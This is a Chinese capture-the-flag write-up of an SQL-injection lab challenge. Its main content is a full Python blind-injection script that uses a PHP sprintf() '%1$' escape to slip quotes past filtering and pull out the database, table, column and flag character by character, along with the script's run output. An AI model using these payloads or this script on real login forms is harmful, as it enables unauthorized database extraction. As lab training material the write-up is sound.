0x01

本题所需知识清单:

1.php sprintf()函数漏洞:https://blog.csdn.net/WQ_BCJ/article/details/85057447

2.布尔盲注基本playload及流程:https://blog.csdn.net/WQ_BCJ/article/details/84592445

3.Burpsuit  Intruder暴力猜解:https://blog.csdn.net/snert/article/details/49749757

4.盲注python(2)脚本:

#coding:utf-8

import requests

import string

def boom():

    url = r'http://10adf3af0baf4f6389bc0eed2495da87fd5e4464bed344e9.game.ichunqiu.com/'

    s = requests.session()

    #会话对象requests.Session能够跨请求地保持某些参数,比如cookies,即在同一个Session实例发出的所有请求都保持同一个cookies,而requests模块每次会自动处理cookies,这样就很方便地处理登录时的cookies问题。

    dic = string.digits + string.letters + "!@#$%^&*()_+{}-="

    right = 'password error!'

    error = 'username error!'

    lens = 0

    i = 0

    #确定当前数据库的长度

    while True:

        payload = "admin%1$\\' or " + "length(database())>" + str(i) + "#"

        data={'username':payload,'password':1}

        r = s.post(url,data=data).content

        if error in r:

            lens=i

            break

        i+=1

        pass

    print("[+]length(database()): %d" %(lens))

    #确定当前数据库的名字

    strs=''

    for i in range(lens+1):

        for c in dic:

            payload = "admin%1$\\' or " + "ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#"

            data = {'username':payload,'password':1}

            r = s.post(url,data=data).content

            if right in r:

                strs = strs + c

                print strs

                break

        pass

    pass

    print("[+]database():%s" %(strs))

    lens=0

    i = 1

    while True:

        payload = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>" + str(i) + "#"

        #对当前的数据库,查询第一个表的长度

        data = {'username':payload,'password':1}

        r = s.post(url,data=data).content

        if error in r:

            lens = i

            break

        i+=1

        pass

    print("[+]length(table): %d" %(lens))

    #查询第一个表的名称

    strs=''

    for i in range(lens+1):

        for c in dic:

            payload = "admin%1$\\' or " + "ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(i) +",1))=" + str(ord(c)) + "#"

            # 数字一定要str才可以传入

            data = {'username':payload,'password':1}

            r = s.post(url,data=data).content

            if right in r:

                strs = strs + c

                print strs

                break

        pass

    pass

    print("[+]table_name:%s" %(strs))

    tablename = '0x' + strs.encode('hex')

    #编码为16进制

    table_name = strs

    lens=0

    i = 0

    while True:

        payload = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name = " + str(tablename) + " limit 0,1)>" + str(i) + "#"

        data = {'username':payload,'password':1}

        r = s.post(url,data=data).content

        if error in r:

            lens = i

            break

        i+=1

        pass

    print("[+]length(column): %d" %(lens))

    strs=''

    for i in range(lens+1):

        for c in dic:

            payload = "admin%1$\\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"

            data = {'username':payload,'password':1}

            r = s.post(url,data=data).content

            if right in r:

                strs = strs + c

                print strs

                break

        pass

    pass

    print("[+]column_name:%s" %(strs))

    column_name = strs

    num=0

    i = 0

    while True:

        payload = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"

        data = {'username':payload,'password':1}

        r = s.post(url,data=data).content

        if error in r:

            num = i

            break

        i+=1

        pass

    print("[+]number(column): %d" %(num))

    lens=0

    i = 0

    while True:

        payload = "admin%1$\\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#"

        data = {'username':payload,'password':1}

        r = s.post(url,data=data).content

        if error in r:

            lens = i

            break

        i+=1

        pass

    print("[+]length(value): %d" %(lens))

    i=1

    strs=''

    for i in range(lens+1):

        for c in dic:

            payload = "admin%1$\\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"

            data = {'username':payload,'password':'1'}

            r = s.post(url,data=data).content

            if right in r:

                strs = strs + c

                print strs

                break

        pass

    pass

    print("[+]flag:%s" %(strs))

if __name__ == '__main__':

    boom()

    print 'Finish!'

0x02解题具体流程

#1. 根据题目SQLI可猜测本题可能为SQL注入

#2.尝试弱口令当username=admin显示密码错误而不是用户名错误可知用户名为admin

#3.使用普通的注入方法:https://blog.csdn.net/WQ_BCJ/article/details/85216275

无果,可以利用burpsuit上的Intruder看那些字符没有被过滤掉,具体使用方法在上面知识清单部分

破解结果为:对比多条length长度异常后发现%字符没有被过滤,且在respone里面发现sprintf()函数的报错(参数太少)

猜测可以利用sprintf()函数进行注入,下面来验证

#4.输入username=admin%1$' and 1=1 # 得到的结果是username error ,换成or则显示password error,证明admin后面的or 1=1       #被执行成功了,验证成功接下来就是盲注时间了:

#5.利用脚本得到flag:脚本及盲注基础知识知识清单处有详细介绍

D:\Python2.7\python2.exe F:/pycharm_work/sqli/sql.py

[+]length(database()): 3

c

ct

ctf

[+]database():ctf

[+]length(table): 4

f

fl

fla

flag

[+]table_name:flag

[+]length(column): 4

f

fl

fla

flag

[+]column_name:flag

[+]number(column): 1

[+]length(value): 42

f

fl

fla

flag

flag{

flag{b

flag{b5

flag{b5b

flag{b5b3

flag{b5b36

flag{b5b361

flag{b5b3612

flag{b5b36121

flag{b5b36121-

flag{b5b36121-8

flag{b5b36121-86

flag{b5b36121-86d

flag{b5b36121-86dd

flag{b5b36121-86dd-

flag{b5b36121-86dd-a

flag{b5b36121-86dd-a4

flag{b5b36121-86dd-a4d

flag{b5b36121-86dd-a4db

flag{b5b36121-86dd-a4db-

flag{b5b36121-86dd-a4db-a

flag{b5b36121-86dd-a4db-aa

flag{b5b36121-86dd-a4db-aab

flag{b5b36121-86dd-a4db-aab3

flag{b5b36121-86dd-a4db-aab3-

flag{b5b36121-86dd-a4db-aab3-8

flag{b5b36121-86dd-a4db-aab3-86

flag{b5b36121-86dd-a4db-aab3-86d

flag{b5b36121-86dd-a4db-aab3-86dd

flag{b5b36121-86dd-a4db-aab3-86ddb

flag{b5b36121-86dd-a4db-aab3-86ddb7

flag{b5b36121-86dd-a4db-aab3-86ddb74

flag{b5b36121-86dd-a4db-aab3-86ddb749

flag{b5b36121-86dd-a4db-aab3-86ddb749d

flag{b5b36121-86dd-a4db-aab3-86ddb749df

flag{b5b36121-86dd-a4db-aab3-86ddb749dfa

flag{自个做一遍去}

Finish!

Process finished with exit code 0

"迎圣诞,拿大奖"赛题——SQLI的更多相关文章

  1. 【天池大数据赛题解析】资金流入流出预测(附Top4答辩ppt)

    http://mp.weixin.qq.com/s?__biz=MzA3MDg0MjgxNQ==&mid=208451006&idx=1&sn=532e41cf020a0673 ...

  2. Hitcon 2016 Pwn赛题学习

    PS:这是我很久以前写的,大概是去年刚结束Hitcon2016时写的.写完之后就丢在硬盘里没管了,最近翻出来才想起来写过这个,索性发出来 0x0 前言 Hitcon个人感觉是高质量的比赛,相比国内的C ...

  3. CSDN 轻松周赛赛题:能否被8整除

    轻松周赛赛题:能否被8整除 题目详情 给定一个非负整数,问能否重排它的全部数字,使得重排后的数能被8整除. 输入格式: 多组数据,每组数据是一个非负整数.非负整数的位数不超过10000位. 输出格式 ...

  4. O准备如何苟进复赛圈?华为软挑开挂指南(附赛题预测)

    事先声明,这不是华为软挑的软广,我也不是海军. 这篇文章纯粹是心血来潮,原因是去年上传到github的参赛代码,前几天又有两个人star和fork了. 记得star热潮还是去年4月复赛刚结束的那几天, ...

  5. kaggle赛题Digit Recognizer:利用TensorFlow搭建神经网络(附上K邻近算法模型预测)

    一.前言 kaggle上有传统的手写数字识别mnist的赛题,通过分类算法,将图片数据进行识别.mnist数据集里面,包含了42000张手写数字0到9的图片,每张图片为28*28=784的像素,所以整 ...

  6. 天池新闻推荐比赛1:赛题理解+baseline

    天池新闻推荐比赛1:赛题理解+baseline 一.比赛信息 比赛链接: ​ https://tianchi.aliyun.com/competition/entrance/531842/inform ...

  7. Python小白的数学建模课-A1.国赛赛题类型分析

    分析赛题类型,才能有的放矢. 评论区留下邮箱地址,送你国奖论文分析 『Python小白的数学建模课 @ Youcans』 带你从数模小白成为国赛达人. 1. 数模竞赛国赛 A题类型分析 年份 题目 要 ...

  8. Python小白的数学建模课-A3.12 个新冠疫情数模竞赛赛题与点评

    新冠疫情深刻和全面地影响着社会和生活,已经成为数学建模竞赛的背景帝. 本文收集了与新冠疫情相关的的数学建模竞赛赛题,供大家参考,欢迎收藏关注. 『Python小白的数学建模课 @ Youcans』带你 ...

  9. MIPS Pwn赛题学习

    MIPS Pwn writeup Mplogin 静态分析   mips pwn入门题. mips pwn查找gadget使用IDA mipsrop这个插件,兼容IDA 6.x和IDA 7.x,在ID ...

随机推荐

  1. java-Queue方法

    Collection>Queue // 1. 新增 add/ offer boolean add(E e); // 队列满,IllegalStateException boolean offer ...

  2. c++的基本点

    C++的要点:    一个思想:抽象(和分类)的思想:    三个概念:类.对象.消息:    三个特征:封装.继承.多态:    一个观念:函数服务于数据.      程序 = 对象 + 消息   ...

  3. 154. Find Minimum in Rotated Sorted Array II(循环数组查找)

    Suppose an array sorted in ascending order is rotated at some pivot unknown to you beforehand. (i.e. ...

  4. Cephfs 操作输出到日志查询系统

    前言 文件系统当中如果某些文件不见了,有什么办法判断是删除了还是自己不见了,这个就需要去日志里面定位了,通常情况下是去翻日志,而日志是会进行压缩的,并且查找起来非常的不方便,还有可能并没有开启 这个时 ...

  5. JetCache 源码分析

    一.简介 JetCache是一个基于Java的缓存系统封装,提供统一的API和注解来简化缓存的使用. JetCache提供了比SpringCache更加强大的注解,可以原生的支持TTL.两级缓存.分布 ...

  6. SpringBoot整合Xxl-Job

    一.下载Xxl-Job源代码并导入本地并运行 Github地址:https://github.com/xuxueli/xxl-job 中文文档地址:https://www.xuxueli.com/xx ...

  7. [Kafka][1][初识Kafka]

    目录 第1章 初识Kafka 1.1 发布与订阅消息系统 1.1.1 如何开始 1.1.2 独立的队列系统 1.2 Kafka登场 1.2.1 消息和批次(Message and batch) 1.2 ...

  8. Cypress系列(90)- Cypress.Cookies 命令详解以及如何跨测试用例共享 Cookies

    如果想从头学起Cypress,可以看下面的系列文章哦 https://www.cnblogs.com/poloyy/category/1768839.html Cypress.Cookies 共有三个 ...

  9. Vegas媒体生成器是什么,有什么作用

    在专业视频剪辑软件-Vegas的界面中,有一个媒体生成器的界面,此界面包含HitFilm Light Flares,Pro Type Titler,测试图案,纯色,棋盘格,色彩渐变,噪声纹理,致谢字幕 ...

  10. Jmeter(一)发送http请求

    Jmeter中发请求的步骤 1.添加线程组 2.添加http消息头管理器 3.添加http请求 一.线程组: 1.添加路径: 2.字段解释 ①线程数(Number of Threads): : 设置发 ...